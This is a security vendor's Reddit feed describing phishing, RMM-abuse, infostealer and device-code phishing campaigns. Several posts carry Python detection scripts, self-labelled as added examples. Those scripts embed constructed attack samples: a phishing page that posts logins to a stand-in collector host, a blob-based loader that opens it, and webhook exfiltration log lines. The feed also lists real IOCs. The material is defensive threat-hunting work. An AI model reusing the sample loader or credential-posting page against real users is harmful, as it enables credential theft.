u/ANYRUN-team

Fake Word Online ➡️ Remote Access: Detection Blind Spots in Action

A phishing attack starting from an Outlook email redirects victims to a fake Word Online / OneDrive page, leading to stealthy remote access under the guise of a document preview.

Instead of traditional malware loaders, the chain relies on legitimate tools to establish remote access while blending into normal corporate activity. This reduces visibility for traditional detection and increases the risk of delayed detection and prolonged attacker presence.

In ANYRUN Sandbox, analysts can observe high-value detection signals early in the execution chain, including suspicious document-delivery domains, silent software installation behavior, intermediate deployment stages, and utilities used to hide installed programs.

These artifacts help teams build detections around trusted-tool abuse, suspicious command-line behavior, and phishing infrastructure instead of relying only on file hashes.

Execution chain:

Outlook .eml ➡️ Word Online phishing page ➡️ MSI installer ➡️ Ninite /silent execution ➡️ Remote access via ScreenConnect ➡️ Activity concealment via HideUL 

See the full attack flow and collect IOCs to improve detection coverage.

Explore related activity and validate hunting patterns using this TI Lookup query: filePath:".eml" AND threatName:"phishing" AND (threatName:"^rat$" OR threatName:"^rmm-tool$")

u/ANYRUN-team — 18 hours ago
▲ 2 r/ANYRUN

Fake Word Online ➡️ Remote Access: Detection Blind Spots in Action

A phishing attack starting from an Outlook email redirects victims to a fake Word Online / OneDrive page, leading to stealthy remote access under the guise of a document preview.

Instead of traditional malware loaders, the chain relies on legitimate tools to establish remote access while blending into normal corporate activity. This reduces visibility for traditional detection and increases the risk of delayed detection and prolonged attacker presence.

In ANYRUN Sandbox, analysts can observe high-value detection signals early in the execution chain, including suspicious document-delivery domains, silent software installation behavior, intermediate deployment stages, and utilities used to hide installed programs.

These artifacts help teams build detections around trusted-tool abuse, suspicious command-line behavior, and phishing infrastructure instead of relying only on file hashes.

Execution chain:

Outlook .eml ➡️ Word Online phishing page ➡️ MSI installer ➡️ Ninite /silent execution ➡️ Remote access via ScreenConnect ➡️ Activity concealment via HideUL 

See the full attack flow and collect IOCs to improve detection coverage.

Explore related activity and validate hunting patterns using this TI Lookup query: filePath:".eml" AND threatName:"phishing" AND (threatName:"^rat$" OR threatName:"^rmm-tool$")

Strengthen your SOC, detect complex threats faster, and boost team performance with ANYRUN.
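
The execution chain above (both copies of this post describe the same one) is a good candidate for behavior rules rather than hashes. What follows is an added example, not ANY.RUN's code or output: a small Python rule set run over constructed process-creation events. The executable names, paths, the ScreenConnect launch-string layout (relay host in an h= parameter) and the approved-relay list are assumptions made for illustration.

```python
"""Added example (not ANY.RUN code): rule checks for the trusted-tool chain
described above, run over constructed process-creation telemetry.
Executable names, paths, the ScreenConnect launch-string layout and the
approved-relay list are assumptions made for illustration."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable name, lower-case
    cmdline: str


@dataclass(frozen=True)
class Hit:
    rule: str
    pid: int
    detail: str


# Constructed sample telemetry approximating the post's chain, plus one
# benign silent Ninite run from an IT share as a false-positive check.
SAMPLE_EVENTS = [
    ProcEvent(400, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(812, 400, "outlook.exe", "outlook.exe"),
    ProcEvent(1001, 400, "msiexec.exe",
              r'msiexec.exe /i "C:\Users\u\Downloads\Document_Preview.msi"'),
    ProcEvent(1100, 1001, "ninite.exe",
              r"C:\Users\u\AppData\Local\Temp\Ninite.exe /silent"),
    ProcEvent(1200, 1100, "screenconnect.clientsetup.exe",
              r"C:\Users\u\AppData\Local\Temp\ScreenConnect.ClientSetup.exe"
              " ?e=Access&y=Guest&h=relay.example-support.net&p=8041"),
    ProcEvent(1300, 1001, "reg.exe",
              r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ABCD}"
              " /v SystemComponent /t REG_DWORD /d 1 /f"),
    ProcEvent(1400, 1001, "hideul.exe", r"C:\Users\u\AppData\Local\Temp\HideUL.exe"),
    ProcEvent(2000, 1, "services.exe", "services.exe"),
    ProcEvent(2100, 2000, "ninite.exe", r"C:\ProgramData\IT\Ninite.exe /silent"),
]

USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|appdata\\local\\temp)\\", re.I)
RELAY_PARAM = re.compile(r"[?&]h=([^&\s\"']+)")
APPROVED_RELAYS = {"rmm.corp.example"}          # assumption: the org's own relays
SESSION_ROOTS = {"explorer.exe", "services.exe", "svchost.exe"}


def evaluate(events):
    """Apply the per-process rules; each Hit names the rule and the pid."""
    hits = []
    for e in events:
        cmd = e.cmdline.lower()
        if e.image == "msiexec.exe" and USER_WRITABLE.search(cmd):
            hits.append(Hit("msi_from_user_dir", e.pid, e.cmdline))
        elif e.image == "ninite.exe" and "/silent" in cmd and USER_WRITABLE.search(cmd):
            hits.append(Hit("silent_ninite_user_dir", e.pid, e.cmdline))
        elif e.image.startswith("screenconnect"):
            m = RELAY_PARAM.search(e.cmdline)
            relay = m.group(1) if m else "<relay not in launch string>"
            if relay not in APPROVED_RELAYS:
                hits.append(Hit("rmm_install_unknown_relay", e.pid, relay))
        elif e.image.startswith("hideul") or (
            e.image == "reg.exe" and "uninstall" in cmd and "systemcomponent" in cmd
        ):
            # SystemComponent=1 under an Uninstall key hides the entry from
            # Programs and Features; HideUL automates the same trick.
            hits.append(Hit("hide_uninstall_entry", e.pid, e.cmdline))
    return hits


def subtree_root(pid, by_pid):
    """Walk up to the process launched directly under a session root."""
    cur = by_pid[pid]
    while cur.ppid in by_pid and by_pid[cur.ppid].image not in SESSION_ROOTS:
        cur = by_pid[cur.ppid]
    return cur.pid


def chains(events, hits, min_rules=3):
    """Group hits by installer subtree; a subtree firing >= min_rules distinct
    rules is the delivery chain rather than isolated admin activity."""
    by_pid = {e.pid: e for e in events}
    per_root = {}
    for h in hits:
        per_root.setdefault(subtree_root(h.pid, by_pid), set()).add(h.rule)
    return {root: rules for root, rules in per_root.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for h in found:
        print(f"{h.rule:28} pid={h.pid} {h.detail}")
    print("chains:", chains(SAMPLE_EVENTS, found))
```

The individual rules are noisy on their own (IT really does run Ninite silently, and ScreenConnect is a legitimate product), which is why the sample keeps the path condition and the relay allowlist and then scores the installer subtree: the MSI under Downloads that spawns a silent Ninite, an unknown-relay ScreenConnect client and an uninstall-entry hide all in one subtree is the signal, not any single event.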

u/ANYRUN-team — 19 hours ago

Compromised accounts enable BEC, data exfiltration, and lateral movement, creating direct financial and operational risk. This campaign generates phishing pages directly inside the browser using blob objects instead of loading them over the network.

The payload exists entirely in memory, which breaks network visibility and makes traditional detection unreliable. 

ANY.RUN Sandbox exposed in-memory phishing, enabling faster detection and response. See how the attack unfolds

Explore full technical breakdown to understand detection gaps and validate your coverage.

u/ANYRUN-team — 7 days ago
▲ 1 r/ANYRUN

Compromised accounts enable BEC, data exfiltration, and lateral movement, creating direct financial and operational risk.

This campaign generates phishing pages directly inside the browser using blob objects instead of loading them over the network. The payload exists entirely in memory, which breaks network visibility and makes traditional detection unreliable.

ANY.RUN Sandbox helps SOC teams observe this behavior, exposing in-memory phishing and enabling faster detection and response. See how the attack unfolds and collect IOCs

Explore full technical breakdown to understand detection gaps, validate your coverage, and strengthen phishing defenses.
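
Because the phishing page in this campaign (described in both copies of the post above) is assembled in the browser from a Blob and never fetched, URL and proxy telemetry only ever see the loader. The following is an added example, not ANY.RUN's code: a static triage script that spots the client-side page-construction primitives in a loader and recovers the embedded page and its collection endpoints. The loader, the phishing page and the collector URL are constructed for illustration.

```python
"""Added example (not ANY.RUN code): static triage of a loader page that
builds its phishing form in memory from a Blob, as described above.
The loader and phishing page below are constructed for illustration;
the collector URL is an assumption."""
import base64
import re

# Constructed phishing page that the loader will carry as base64.
PHISH_PAGE = """<html><head><title>Sign in</title></head><body>
<form action="https://collector.example.net/post.php" method="post">
<input name="login"><input name="passwd" type="password"><button>Sign in</button>
</form>
<script>fetch("https://collector.example.net/beacon?s=1");</script>
</body></html>"""

# Constructed loader: nothing phishing-related is fetched from the network;
# the page is decoded client-side and opened as a blob: URL.
LOADER = """<html><body><script>
var p="__B64__";
var b=new Blob([atob(p)],{type:"text/html"});
location.href=URL.createObjectURL(b);
</script></body></html>""".replace("__B64__", base64.b64encode(PHISH_PAGE.encode()).decode())

INDICATORS = ("new Blob(", "URL.createObjectURL", "atob(", "document.write(", "srcdoc=")
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{64,}={0,2})["']""")
ENDPOINT = re.compile(r"""(?:action=|fetch\(|open\(\s*["'][A-Z]+["']\s*,\s*)["']?(https?://[^"'\s>)]+)""")


def inmemory_indicators(html):
    """Which client-side page-construction primitives the loader uses."""
    return {i for i in INDICATORS if i in html}


def extract_payloads(html):
    """Decode every long base64 literal that turns out to be HTML."""
    pages = []
    for m in B64_LITERAL.finditer(html):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8", "ignore")
        except (ValueError, UnicodeDecodeError):
            continue
        if re.search(r"<(html|form|script)\b", text, re.I):
            pages.append(text)
    return pages


def exfil_endpoints(page):
    """Form targets and fetch/XHR URLs inside a recovered page."""
    return set(ENDPOINT.findall(page))


def analyze(html):
    payloads = extract_payloads(html)
    return {
        "indicators": inmemory_indicators(html),
        "payloads": payloads,
        "exfil_endpoints": set().union(*(exfil_endpoints(p) for p in payloads)),
    }


if __name__ == "__main__":
    result = analyze(LOADER)
    print("indicators:", sorted(result["indicators"]))
    print("endpoints: ", sorted(result["exfil_endpoints"]))
```

The recovered endpoints are the part worth blocking: the loader's own host is usually disposable, while the credential collector tends to be reused. Real loaders often split or lightly obfuscate the base64 literal, so the regex here is the first thing an operator will change; a sandbox that records the blob: navigation and the resulting DOM stays ahead of that.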

u/ANYRUN-team — 8 days ago
▲ 3 r/MSSP

A huge part of the queue ends up being noise, but analysts still have to spend time reviewing and triaging it. Over time, that affects everything: response speed, investigation quality and overall efficiency.

What makes it harder is that once the volume gets high enough, teams naturally start moving faster just to keep up. And that’s where important detections can get buried or downgraded.

What has made the biggest difference for your team when it comes to reducing unnecessary alerts?

u/ANYRUN-team — 8 days ago
▲ 1 r/ANYRUN

Reaching a higher level of SOC maturity comes down to making better, more consistent decisions during malware and phishing investigations.

That requires rethinking how threat intelligence is used: not just as a reference, but as a core part of the decision-making process.

To move from reactive to confidently proactive security, you need a threat intelligence workflow that:

  • addresses key challenges like alert fatigue and visibility gaps
  • integrates seamlessly into SOC workflows and supports them
  • delivers compounding value as part of a unified system

Learn how you can adopt behavioral TI to reduce MTTR and business risk: https://any.run/cybersecurity-blog/soc-maturity-with-threat-intelligence/

u/ANYRUN-team — 9 days ago
▲ 3 r/ANYRUN

MicroStealer is a rapidly emerging infostealer that spreads quickly while maintaining low detection rates. It uses a sophisticated multi-stage delivery chain and exfiltrates data via Discord webhooks and attacker-controlled servers.

MicroStealer: Key Features

  1. MicroStealer uses a layered NSIS → Electron → Java chain for evasion and rapid spread.
  2. It steals more than passwords, focusing on browser sessions, cookies, screenshots, and wallets for immediate impact.
  3. Low AV detection + redundant exfiltration (Discord + C2) enable quick, reliable data theft.
  4. Session hijacking turns endpoint compromise into persistent enterprise access.
  5. Behavior-based sandbox analysis is essential for early detection of emerging stealers.
  6. Proactively defend with ANY.RUN's Threat Intelligence Lookup for instant IOC/variant hunting and Threat Intelligence Feeds for real-time campaign visibility and automated protection: threatName:"microstealer".

Read the full article to learn how to detect it early: https://any.run/malware-trends/microstealer/

Malware overview in TI Lookup: landscape, IOCs, and more
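
The Discord webhook channel mentioned above is the easier of the two exfiltration paths to hunt, because webhook URLs have a fixed shape. The following is an added example, not ANY.RUN's code: a Python check over constructed proxy log lines that flags webhook POSTs from non-browser processes and pivots on the webhook ID. The log layout, host and process names and the token value are assumptions.

```python
"""Added example (not ANY.RUN code): hunting Discord-webhook exfiltration,
one of the two channels the post describes, in constructed proxy log lines.
Log layout, host names, process names and the webhook token are assumptions."""
import re
import shlex

# Discord webhook URLs: snowflake ID (17-20 digits) followed by a long token.
WEBHOOK = re.compile(
    r"https?://(?:canary\.|ptb\.)?discord(?:app)?\.com/api/(?:v\d+/)?webhooks/(\d{17,20})/([\w-]{60,})"
)
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "discord.exe"}

TOKEN = "A1b2C3d4" * 9          # constructed 72-char stand-in for a webhook token
# Constructed lines: ts host process method url bytes_out "user-agent"
SAMPLE_PROXY_LOG = [
    f'2025-05-02T10:14:03 host-17 java.exe POST https://discord.com/api/webhooks/123456789012345678/{TOKEN} 14120 "Java/17.0.2"',
    '2025-05-02T10:14:05 host-17 java.exe POST https://198.51.100.23/gate.php 9882 "Java/17.0.2"',
    f'2025-05-02T11:02:40 host-22 updater.exe POST https://discordapp.com/api/webhooks/123456789012345678/{TOKEN} 20310 "Mozilla/5.0 (Windows NT 10.0) Electron/28.0.0"',
    '2025-05-02T11:10:12 host-31 chrome.exe GET https://discord.com/channels/1/2 512 "Mozilla/5.0 (Windows NT 10.0) Chrome/124.0"',
]


def find_webhook_exfil(lines):
    """POSTs to a webhook URL; severity is high unless a browser did it."""
    findings = []
    for line in lines:
        ts, host, proc, method, url, bytes_out, ua = shlex.split(line)
        m = WEBHOOK.search(url)
        if not m or method != "POST":
            continue
        findings.append({
            "ts": ts, "host": host, "process": proc, "bytes_out": int(bytes_out),
            "webhook_id": m.group(1),
            "severity": "medium" if proc in BROWSERS else "high",
        })
    return findings


def campaign_pivot(findings):
    """Same webhook ID on several hosts = one operator's collection point."""
    pivot = {}
    for f in findings:
        pivot.setdefault(f["webhook_id"], set()).add(f["host"])
    return pivot


if __name__ == "__main__":
    hits = find_webhook_exfil(SAMPLE_PROXY_LOG)
    for h in hits:
        print(h)
    print(campaign_pivot(hits))
```

The second constructed line, a POST to a bare IP, is the redundant C2 channel the post mentions; it does not match here on purpose, since it needs a different rule (POST to raw IP from a non-browser process, for example). The webhook ID, not the token, is the pivot key to share: it is stable across the token and shows up in TI as the same value across infections.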

u/ANYRUN-team — 10 days ago

A large-scale campaign is targeting U.S. organizations with fake event invitations. Attackers combine credential theft with OTP interception and RMM deployment, enabling direct remote access.

Activity is concentrated in the U.S., with high risk across banking, government, tech, and healthcare, indicating broad exposure across business-critical sectors.

Some phishing pages show signs of AI-assisted generation, while embedded code reveals reuse of common phishing kits, allowing attackers to scale and rapidly create new lures.

The risk goes beyond phishing. Remote access to the corporate environment is established through legitimate tools like ScreenConnect, ITarian, and Datto RMM, while infrastructure and domains are designed to look trustworthy, delaying detection and increasing attacker dwell time.

The flow starts with a CAPTCHA page, followed by a fake “event invitation” and then splits into two paths: credential harvesting via phishing login pages or RMM installation.
In this case, the download starts automatically, establishing access early in the execution chain, before user awareness. See how the full flow unfolds, from initial redirect to remote access delivery: https://app.any.run/tasks/4c2687da-1426-43c3-8e16-868f90fb9361/

Despite infrastructure changes, the campaign relies on repeatable patterns: consistent URL structure across phishing domains, fixed resource paths like /Image/*.png, and sequential requests such as /favicon.ico ➡️ /blocked.html ➡️ phishing content. 

Explore these patterns, uncover related activity, and pivot from IOCs in TI Lookup.

u/ANYRUN-team — 14 days ago
▲ 5 r/ANYRUN+1 crossposts

A large-scale campaign is targeting U.S. organizations with fake event invitations. Attackers combine credential theft with OTP interception and RMM deployment, enabling direct remote access.

Activity is concentrated in the U.S., with high risk across banking, government, tech, and healthcare, indicating broad exposure across business-critical sectors.

Some phishing pages show signs of AI-assisted generation, while embedded code reveals reuse of common phishing kits, allowing attackers to scale and rapidly create new lures.

The risk goes beyond phishing. Remote access to the corporate environment is established through legitimate tools like ScreenConnect, ITarian, and Datto RMM, while infrastructure and domains are designed to look trustworthy, delaying detection and increasing attacker dwell time.

The flow starts with a CAPTCHA page, followed by a fake “event invitation” and then splits into two paths: credential harvesting via phishing login pages or RMM installation.
In this case, the download starts automatically, establishing access early in the execution chain, before user awareness. See how the full flow unfolds, from initial redirect to remote access delivery: https://app.any.run/tasks/4c2687da-1426-43c3-8e16-868f90fb9361/

With ANYRUN Sandbox and Threat Intelligence, analysts can safely reconstruct the full attack chain and identify related patterns across campaigns. This enables earlier confirmation of phishing activity, reduces MTTD, and helps contain incidents before impact.

Early-stage signals make this campaign detectable. These appear before credentials are entered and are visible in ANYRUN Sandbox at the start of the execution chain, enabling faster and more confident response decisions.

Despite infrastructure changes, the campaign relies on repeatable patterns: consistent URL structure across phishing domains, fixed resource paths like /Image/*.png, and sequential requests such as /favicon.ico ➡️ /blocked.html ➡️ phishing content. 

Explore these patterns, uncover related activity, and pivot from IOCs in TI Lookup.
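
The repeatable patterns named above (both copies of this post list them) can be checked without any domain list at all. The following is an added example, not ANY.RUN's code: a Python check over constructed web-proxy requests that looks for the /favicon.ico then /blocked.html then landing-page sequence from one client to one host inside a short window, and for the fixed /Image/*.png resource paths. Host names, timestamps and the window size are assumptions.

```python
"""Added example (not ANY.RUN code): the per-host request sequence and resource
path pattern described above, checked over constructed web-proxy requests.
Host names, timestamps and the time window are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed requests: (timestamp, client, host, path)
SAMPLE_REQUESTS = [
    ("2025-04-28T09:00:01", "10.1.1.5", "invite.example.net", "/favicon.ico"),
    ("2025-04-28T09:00:02", "10.1.1.5", "invite.example.net", "/blocked.html"),
    ("2025-04-28T09:00:04", "10.1.1.5", "invite.example.net", "/verify/index.html"),
    ("2025-04-28T09:00:05", "10.1.1.5", "invite.example.net", "/Image/logo.png"),
    ("2025-04-28T09:00:05", "10.1.1.5", "invite.example.net", "/Image/bg.png"),
    # Benign: normal site, favicon then content, no blocked.html
    ("2025-04-28T09:05:00", "10.1.1.7", "intranet.example.com", "/favicon.ico"),
    ("2025-04-28T09:05:01", "10.1.1.7", "intranet.example.com", "/index.html"),
    # Same three paths but hours apart: not one redirect flow
    ("2025-04-28T10:00:00", "10.1.1.9", "cdn.example.org", "/favicon.ico"),
    ("2025-04-28T13:00:00", "10.1.1.9", "cdn.example.org", "/blocked.html"),
    ("2025-04-28T13:00:01", "10.1.1.9", "cdn.example.org", "/landing"),
]
SEQUENCE = ("/favicon.ico", "/blocked.html")   # then whatever the landing page is
IMAGE_PATH = re.compile(r"^/Image/[^/]+\.png$")


def find_sequences(requests, window=timedelta(seconds=30)):
    """One match per (client, host) whose requests contain
    favicon.ico -> blocked.html -> <landing> within `window`."""
    by_flow = defaultdict(list)
    for ts, client, host, path in requests:
        by_flow[(client, host)].append((datetime.fromisoformat(ts), path))
    matches = []
    for (client, host), reqs in by_flow.items():
        reqs.sort()
        for i in range(len(reqs) - 2):
            start = reqs[i][0]
            if (reqs[i][1], reqs[i + 1][1]) == SEQUENCE and reqs[i + 2][0] - start <= window:
                matches.append({"client": client, "host": host, "landing": reqs[i + 2][1]})
                break
    return matches


def kit_hosts(requests):
    """Hosts that show the sequence and the fixed /Image/*.png resource paths."""
    seq_hosts = {m["host"] for m in find_sequences(requests)}
    img_hosts = {host for _, _, host, path in requests if IMAGE_PATH.match(path)}
    return seq_hosts & img_hosts


if __name__ == "__main__":
    for m in find_sequences(SAMPLE_REQUESTS):
        print("sequence on", m["host"], "landing at", m["landing"])
    print("kit hosts:", kit_hosts(SAMPLE_REQUESTS))
```

The window is what keeps this from matching every site that happens to have a blocked.html: the kit serves the three requests back to back as one redirect flow, so a gap of hours is ordinary browsing. Requiring the /Image/*.png paths on the same host as well turns a weak ordering signal into something you can page on, and the landing path that falls out is a ready pivot into TI Lookup.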

u/ANYRUN-team — 14 days ago

We’re a team of malware analysts from ANYRUN, the Interactive Sandbox and Threat Intelligence Lookup you might already be using in your investigations. Our team is made up of experts across different areas of information security and threat analysis, including reverse engineers and network traffic specialists.

We’re happy to talk about:

  • Recent malware trends and ongoing attack campaigns;
  • Real case studies and incident breakdowns from our research;
  • SOC workflows — triage, investigation, and response decisions.

 Our latest research:

We’ll be here on Wednesday–Thursday (April 29–30) to answer your questions. Let’s get into it!

u/ANYRUN-team — 15 days ago
▲ 2 r/ANYRUN

EvilTokens is a PhaaS toolkit that automates device code phishing attacks against Microsoft 365 and Entra ID environments. Unlike traditional credential-harvesting phishing, EvilTokens tricks users into completing legitimate authentication on Microsoft's own login pages, resulting in the issuance of valid OAuth access and refresh tokens directly to the attacker, effectively bypassing MFA without stealing passwords.

  • As a PhaaS kit sold on Telegram, it democratizes sophisticated attacks, enabling rapid scaling with minimal technical skill.
  • AI-powered features generate convincing lures and automate BEC, increasing both volume and success rates.
  • Persistent refresh tokens allow long-term access, device registration, and silent authentication across M365 services.
  • Organizations in finance, government, healthcare, and other M365-heavy sectors are prime targets globally.

 

Security teams can query ANYRUN's Threat Intelligence Lookup for known EvilTokens domains, URLs, and infrastructure indicators in real time: destinationIP:"75.98.162.49".

See the full article and analysis session: https://any.run/malware-trends/eviltokens/

Malicious IP linked to EvilTokens
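
The device code flow the post describes leaves one consistent trace: the sign-in is recorded with the device-code protocol, whatever app name the kit chose to impersonate. The following is an added example, not ANY.RUN's code: a Python hunt over constructed records shaped like Microsoft Graph / Entra sign-in log entries. The corporate IP ranges, the list of apps expected to use the grant, and the records themselves are assumptions; the field names follow the Graph signIn resource.

```python
"""Added example (not ANY.RUN code): flagging device-code sign-ins, the flow
EvilTokens abuses, over constructed records shaped like Microsoft Graph / Entra
sign-in log entries. The corporate IP ranges, app allowlist and the records
themselves are assumptions; the field names follow the Graph signIn resource."""
import ipaddress

CORP_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("198.51.100.0/24")]
# assumption: apps your admins really do use with the device-code grant
EXPECTED_DEVICE_CODE_APPS = {"Microsoft Azure CLI"}

SAMPLE_SIGNINS = [  # constructed
    {"createdDateTime": "2025-04-27T14:02:11Z", "userPrincipalName": "alice@example.com",
     "appDisplayName": "Microsoft Office", "resourceDisplayName": "Microsoft Graph",
     "ipAddress": "203.0.113.50", "authenticationProtocol": "deviceCode"},
    {"createdDateTime": "2025-04-27T14:10:00Z", "userPrincipalName": "bob@example.com",
     "appDisplayName": "Microsoft Azure CLI",
     "resourceDisplayName": "Windows Azure Service Management API",
     "ipAddress": "10.20.0.5", "authenticationProtocol": "deviceCode"},
    {"createdDateTime": "2025-04-27T14:12:30Z", "userPrincipalName": "carol@example.com",
     "appDisplayName": "Microsoft Office", "resourceDisplayName": "Microsoft Graph",
     "ipAddress": "203.0.113.9", "authenticationProtocol": "oAuth2"},
]


def is_corporate(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CORP_NETS)


def flag_device_code_signins(records):
    """Every device-code sign-in is worth a look: the user satisfied MFA on the
    real Microsoft page, but the tokens went to whoever started the flow.
    Severity rises when the sign-in IP is outside the estate or the app is
    not one that legitimately uses the grant."""
    alerts = []
    for r in records:
        if r.get("authenticationProtocol") != "deviceCode":
            continue
        reasons = []
        if not is_corporate(r["ipAddress"]):
            reasons.append("sign-in IP outside corporate ranges")
        if r["appDisplayName"] not in EXPECTED_DEVICE_CODE_APPS:
            reasons.append("app not expected to use device code")
        alerts.append({
            "user": r["userPrincipalName"], "app": r["appDisplayName"],
            "ip": r["ipAddress"], "time": r["createdDateTime"],
            "severity": "high" if reasons else "low", "reasons": reasons,
        })
    return alerts


if __name__ == "__main__":
    for a in flag_device_code_signins(SAMPLE_SIGNINS):
        print(a["severity"], a["user"], a["app"], a["ip"], "; ".join(a["reasons"]))
```

Treat the low-severity rows as inventory rather than noise: they tell you which users and apps genuinely need the grant, which is the list to keep when you restrict it (Entra Conditional Access has an authentication-flows condition for blocking the device code flow for everyone else). A high-severity hit on a first-party app name such as Office is the EvilTokens shape, since the kit borrows well-known client identities rather than registering its own.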

u/ANYRUN-team — 17 days ago

Redirect chains, fake CAPTCHA, and fast-changing delivery paths make traditional detection unreliable. By the time credentials are targeted, the signal is already lost, which creates a critical gap in triage. The key is detecting phishing earlier, while patterns are still stable, before the flow fully unfolds.

Here are two examples showing how early-stage signals help identify phishing activity before it escalates:

  1. Redirect infrastructure

The chain starts from a Google link leading to a compromised site. A hidden HTML page extracts victim data from the URL fragment and triggers a redirect before any user interaction. Analysis session.

In TI Lookup, this activity can be traced by searching for URL fragments containing the #...Family= parameter, which is used to pass victim data and drive redirection. This helps uncover similar samples and track reuse across campaigns.

Use this query to pivot from this signal and uncover related activity.

  2. Fake CAPTCHA delivery

After the initial redirect, the victim is presented with a legit-looking CAPTCHA to build trust before being redirected to a phishing page, a fake Microsoft login page powered by EvilProxy. Analysis session.

Detection here relies on consistent URL parameters (v, session, cid, iat, loc, build) that appear early in the execution chain. Searching for this structure helps surface related signals and build early-stage detection, reducing MTTD, improving coverage and MTTR.

Use this query to surface related phishing activity and validate detection patterns.

You can now test TI's impact on triage, response, and threat hunting directly in your workflows. With 20 premium search requests available, SOC and MSSP teams can validate activity against real-world data, reduce uncertainty, and make faster, evidence-based decisions.

IOCs:
URL patterns:
hxxps://<redirector_site>/*#<8 digits>Family=<base64-victim email>
hxxps://<phishing_domain>/?v=<hexadec_chars>&session=<session_id>&cid=<client_id>&iat=<digits>&loc=<location_code>&build=<build_version>

Domains:
kjcleaningservices[.]com[.]au
starllamerchantservices[.]club
lavor[.]sbs
echosign[.]co[.]it
dspconsulting[.]eu

u/ANYRUN-team — 21 days ago
▲ 2 r/ANYRUN

Redirect chains, fake CAPTCHA, and fast-changing delivery paths make traditional detection unreliable. By the time credentials are targeted, the signal is already lost, which creates a critical gap in triage. The key is detecting phishing earlier, while patterns are still stable, before the flow fully unfolds.

With ANYRUN TI Lookup, teams can move from isolated indicators to full context, identify attack patterns, and validate detection logic against real attack data from 15K+ organizations.

Here are two examples showing how early-stage signals help identify phishing activity before it escalates:

  1. Redirect infrastructure

The chain starts from a Google link leading to a compromised site. A hidden HTML page extracts victim data from the URL fragment and triggers a redirect before any user interaction. Analysis session.

In TI Lookup, this activity can be traced by searching for URL fragments containing the #...Family= parameter, which is used to pass victim data and drive redirection. This helps uncover similar samples and track reuse across campaigns.

Use this query to pivot from this signal and uncover related activity.

  2. Fake CAPTCHA delivery

After the initial redirect, the victim is presented with a legit-looking CAPTCHA to build trust before being redirected to a phishing page, a fake Microsoft login page powered by EvilProxy. Analysis session.

Detection here relies on consistent URL parameters (v, session, cid, iat, loc, build) that appear early in the execution chain. Searching for this structure helps surface related signals and build early-stage detection, reducing MTTD, improving coverage and MTTR.

Use this query to surface related phishing activity and validate detection patterns.

You can now test TI's impact on triage, response, and threat hunting directly in your workflows. With 20 premium search requests available, SOC and MSSP teams can validate activity against real-world data, reduce uncertainty, and make faster, evidence-based decisions.
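
The two URL shapes this post relies on (spelled out in the IOC section of the earlier copy: a redirector with a #<8 digits>Family=<base64 e-mail> fragment, and an EvilProxy landing page with v, session, cid, iat, loc and build query keys) are stable enough to parse directly. The following is an added example, not ANY.RUN's code: a Python classifier that refangs a URL, recognises either shape and recovers the victim address from the redirector fragment. The domains, paths and parameter values in the sample URLs are constructed; only the two patterns come from the post.

```python
"""Added example (not ANY.RUN code): a classifier for the two URL shapes
listed in the post's IOC section, the redirector fragment and the EvilProxy
landing query string, run over constructed URLs. Domains, paths and values
are assumptions; the two patterns come from the post."""
import base64
import re
from urllib.parse import urlsplit, parse_qs

FRAGMENT = re.compile(r"^\d{8}Family=([A-Za-z0-9+/_-]+={0,2})$")
LANDING_KEYS = {"v", "session", "cid", "iat", "loc", "build"}


def refang(url):
    """Undo the usual hxxp / [.] defanging used when sharing IOCs."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def decode_victim(b64):
    """Base64 (standard or URL-safe, padding optional) -> e-mail, or None."""
    std = b64.replace("-", "+").replace("_", "/")
    std += "=" * (-len(std) % 4)
    try:
        text = base64.b64decode(std, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if "@" in text else None


def classify(url):
    parts = urlsplit(refang(url))
    m = FRAGMENT.match(parts.fragment)
    if m:
        victim = decode_victim(m.group(1))
        if victim:
            return {"kind": "redirector", "host": parts.hostname, "victim": victim}
    q = parse_qs(parts.query)
    if (LANDING_KEYS <= set(q) and re.fullmatch(r"[0-9a-fA-F]+", q["v"][0])
            and q["iat"][0].isdigit()):
        return {"kind": "evilproxy_landing", "host": parts.hostname,
                "session": q["session"][0], "cid": q["cid"][0], "build": q["build"][0]}
    return {"kind": "none", "host": parts.hostname}


def hunt(urls):
    """Keep only URLs that match one of the two campaign shapes."""
    return [c for c in (classify(u) for u in urls) if c["kind"] != "none"]


# Constructed sample URLs; the redirector one carries a base64 victim address.
SAMPLE_URLS = [
    "https://redirector.example.net/wp-content/view.html#20250407Family="
    + base64.b64encode(b"victim@example.com").decode(),
    "https://login-secure.example.net/?v=a1f3c9&session=7f2e&cid=1184&iat=1714053600&loc=us&build=3.2.1",
    "https://www.example.com/?q=1#section2",
]

if __name__ == "__main__":
    for c in hunt(SAMPLE_URLS):
        print(c)
```

The fragment is the part worth remembering: it never reaches the redirector's server, so web logs on the compromised site will not show the victim address, while a proxy or sandbox that records the full URL will. Recovering the address also tells you which mailbox to check for the original lure, and the session and cid values on the landing page are the natural pivots back into TI Lookup.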

u/ANYRUN-team — 21 days ago
▲ 3 r/ANYRUN

90% of attacks start with phishing. For CISOs, the real challenge begins when the SOC can’t quickly determine whether an alert is just noise or the start of credential theft, account takeover, malware delivery, or broader business disruption.

Today’s phishing is more disruptive because campaigns combine multiple techniques at once. It’s no longer a single email with a malicious link. Security teams now face layered attack flows that can include:

  • redirect chains that hide the real destination
  • QR codes that bypass traditional inspection
  • CAPTCHAs that slow or block analysis
  • AI-generated lures and deepfake content that increase credibility

Here are 3 steps to strengthen phishing detection across your environment: https://any.run/cybersecurity-blog/phishing-detection-steps-for-cisos/

Numbers proving the danger of modern phishing attacks

u/ANYRUN-team — 22 days ago
▲ 2 r/ANYRUN

  • Lazarus Group is running an active campaign using fake meetings to gain access to corporate systems, credentials, and sensitive data. 
